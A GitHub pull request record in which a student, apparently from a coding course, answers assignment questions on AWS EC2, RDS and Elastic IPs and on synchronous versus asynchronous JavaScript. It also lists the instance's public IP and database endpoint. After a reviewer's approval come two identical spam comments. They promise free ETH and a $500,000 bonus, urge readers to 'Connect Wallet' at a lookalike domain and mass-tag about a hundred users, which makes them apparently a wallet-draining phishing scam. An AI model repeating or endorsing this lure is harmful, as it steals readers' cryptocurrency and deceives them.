### PR TITLE
remote-week1: second commit

### PR DESCRIPTION
**Pull request by Viktor879**
<h2> Elastic IP address</h2>

Public:13.56.219.179
Private:172.31.17.62

<h2> Database name</h2>

appworks-rds-1.ciqv4wzzwiih.us-west-1.rds.amazonaws.com

<h2> Change Summary</h2>

1. add PR readme 
2. add  requestAsync.js and requestSync.js

<h1> Assignment 1 understanding check :</h1>

aws_problems

(1)
ec2tords
pctords

  1. Use the correct RDS instance endpoint.
  2. Provide the correct MySQL username and password.(can check from secret manager)
  3. Ensure that the security group associated with your RDS instance allows inbound traffic on port 3306 from your 
  IP address.

(2) Yes, without an Elastic IP (EIP), the public IP address of our EC2 instance can change when we stop and start the instance. This happens because Amazon EC2 instances in the default configuration are launched with dynamic public IP addresses. These dynamic IP addresses are subject to change whenever the instance is stopped and started, or if it's terminated and replaced.

Elastic IPs, on the other hand, are static IP addresses that you can allocate to your EC2 instances. They do not change even if you stop and start the instance.

(3) 

    1.  Static IP Address : Elastic IPs are useful for scenarios where you need a consistent public IP address for your 
    instance, such as hosting a website or setting up remote access without worrying about IP address changes.

    2. Remote Access : Remote access typically relies on knowing the IP address of the server. Without an EIP, the IP 
    address of your EC2 instance can change, making it challenging to maintain consistent remote access. This can 
    disrupt services that rely on a stable IP address, such as remote desktop connections, VPNs, or SSH access.

<h1> Assignment 3 questions :</h1>

sync_vs_async_problems

sync

async

(1) 

Synchronous functions (e.g., requestSync) block the execution of the program until the operation (in this case, the HTTP request) is completed. They run sequentially, one after the other.

Asynchronous functions (e.g., requestCallback, requestPromise, requestAsyncAwait) allow other code to run while waiting for the operation to complete. They don't block the program's execution and can run concurrently.

In the experiment, I observed that synchronous functions (requestSync) took longer to complete because they executed sequentially, while asynchronous functions (requestCallback, requestPromise, requestAsyncAwait) allowed for concurrent execution(not parallel, because the tasks are interleaved in time, but not necessarily happen simultaneously), resulting in potentially faster completion times.

the key difference between concurrent and parallel is whether or not the tasks share resources. In concurrent processes, multiple tasks share the same resources (like a CPU or memory), but they don't necessarily happen at the same time. In parallel processes, multiple tasks are performed at the same time and they may or may not share resources. So, in concurrent processes, tasks are interleaved in time, but in parallel processes, tasks can happen simultaneously.

A good example of a concurrent process is a web browser. When we open a web browser, it might start downloading multiple resources at once (like images, CSS files, and JavaScript files), and these tasks might be interleaved in time. But these resources might not necessarily be downloaded at the same time, so they're not truly parallel tasks. 

A great example of a truly parallel process is the graphics processing unit (GPU) inside a computer. A GPU can have multiple cores, and each core can process a different task at the same time. So, if the GPU is rendering a 3D scene, it might be drawing multiple different objects at the same time using its different cores. This is truly parallel processing, because the tasks are truly happening at the same time and sharing resources. 

(2)

Asynchronous functions are most useful in situations where you want to avoid blocking the main program thread. 

They are also valuable in scenarios where multiple tasks can be performed concurrently to save time, like fetching data from multiple sources simultaneously.

(3)

Callbacks (requestCallback): Suitable for handling asynchronous operations when you need fine-grained control over error handling and execution flow. Callbacks can lead to callback hell (nested callbacks) and can be less readable in complex scenarios.

Promises (requestPromise): Provide a cleaner and more structured way to work with asynchronous code, particularly when handling multiple asynchronous operations sequentially or in parallel. They make error handling more straightforward with .catch().

Async/Await (requestAsyncAwait): Offers a more readable and synchronous-like syntax for working with Promises. It's a good choice when you want to write asynchronous code that closely resembles synchronous code, making it easier to understand.

Pros and Cons:

Callbacks: Low-level control, but can lead to callback hell.
Promises: Improved readability and error handling.
Async/Await: Further improves readability and simplifies asynchronous code.

(4)

asynchronous code can improve the responsiveness of your program, but it can also introduce complexity, especially in scenarios with multiple asynchronous operations and error handling.

Proper error handling is essential in asynchronous code to ensure that errors are caught and handled gracefully.

### CODE REVIEW

**Comment by addie-tyc** [comment]
> Asynchronous functions (e.g., requestCallback, requestPromise, requestAsyncAwait) allow other code to run while waiting for the operation to complete. They don't block the program's execution and can run concurrently.

> In the experiment, you observed that synchronous functions (requestSync) took longer to complete because they executed sequentially, while asynchronous functions (requestCallback, requestPromise, requestAsyncAwait) allowed for parallel execution, resulting in potentially faster completion times.

在這邊提到了 concurrent 和 parallel 這兩者的差異是什麼呢？

**Comment by addie-tyc** [comment]
同步與非同步的比較大致沒有問題，但從 assignment 3 的實驗結果來看 requestSync 和 requestAsync 執行時間好像沒有差很多？code 的部分可能需要調整喔！

**Review by addie-tyc — APPROVED** [review]
LGTM

**Comment by avijit14** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
krish-1504, @Octavan, @dipankarsrirag, @josephbkt, @Blackthornn, @codexquantum, @hjeffreywang, @luke-jensen, @rjrobben, @YashinG, @chirochiro, @flolep2607, @govship, @alvinliu588950, @chopwoodwater, @hjbc3, @agonzalezcas, @DanielleJHolliday, @AlvaroMaza, @heyimjonas, @suraj-kumar24, @DongHwanJang, @andingzhu, @findmeandkillme, @Amanv24, @mnishok, @bfgdigital, @KNUAI, @AnqiLiuFordham, @paulozhang42, @lorrenlml, @Lindberg84, @wjyum, @nishit-g, @datakim, @wuyongyi, @ownport, @hugecheng, @hqxmlm, @IsmailHaris, @mondler, @amazingGP, @joshtan0710, @lattic, @mogaio, @atoder, @AshishBaruah, @LBJ31li, @sh-abhi, @imajeetyadavrithvik32, @angkul07, @mat-ej, @isaacjgonzalez, @varundatta, @lucas-alves-souza, @michaelcheng022, @xgalenki, @SilverStar1003, @MauGx3, @frankfanslc, @jsyizdabet, @kylezhangwei, @AngusZHAN, @vikash1a, @wangmn93, @LBrummer, @songqiang321, @atakanokan, @plutodevops, @bmak123, @Agiyogi, @KentChun33333, @dmrd, @oliverwsd, @drgnz, @andtheysay, @eightrivers, @mbadros, @teehanming, @yuyang2009, @npuaca, @usametov, @SANEBEN, @SebastienEveno, @vivekvc, @Rxann, @FrankCCCCC, @prakashsellathurai, @coma2010, @hei13h, @dsoniran, @JonatanGk, @Arturus, @zaoldyeck, @wchatx, @Vobliss, @thinkphoebe, @rhinorider, @trideau

**Comment by steamyrails** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
kiskinvlad, @dotsource, @dvdmllr, @eqarqash, @jorgerance, @aleixsole, @rogerhung, @BananaPukeh, @nitish-arali, @bradtrebilcock, @blackrose87, @Bribon4, @choyi0521, @kuzyasun, @alexeypro, @LaneTwo, @Exmoond, @OverFitted, @schmerk, @JeromyJSmith, @bigheadz, @jaNGOB, @fredgrott, @epsimatic88, @sashetov, @Kasmetski, @blizzfire101, @Bakeneko, @Thndr, @skyh24, @L0ve4nature, @RCDNC-ai, @willchenjian, @HubertUrbanski, @Nielex, @sanketpavar, @samwelll, @souljaecker, @nsill, @djatlantic, @sanshao, @quantsolo, @Destray32, @jaamores, @pakostnv, @webneshin, @andreicozma1, @sandu-c, @ClemDelp, @nibarulabsjanisblaus, @ricksinclair, @PauloRManso, @GryphonR, @jaNGOB, @bagg3rs, @mysky528, @camarigor, @choperlizer, @zwdnyc, @geoffsee, @tsxgithub01, @erson, @ceoworks, @Saylux, @stritti, @SaintTan, @soplwang, @wknight1, @ishankbahl, @jackie-ng, @schmerk, @sbusso, @akhercha, @DaveNW16HD, @localredhead, @seven7e, @richardisme, @houston1784, @aidenlock, @kaiykay, @arasbuyukaras, @brunoaduarte, @dongabrielli, @gplusq, @giacomoguiulfo, @lunamcsv, @Tommekk, @tpickett, @wavyx, @Eivlys, @federosso, @wescleveland, @max12m3r, @budaihu, @mr8bit, @realcotter, @stanzani, @wesselperik, @fwoelffel

**Pull request closed without merging**
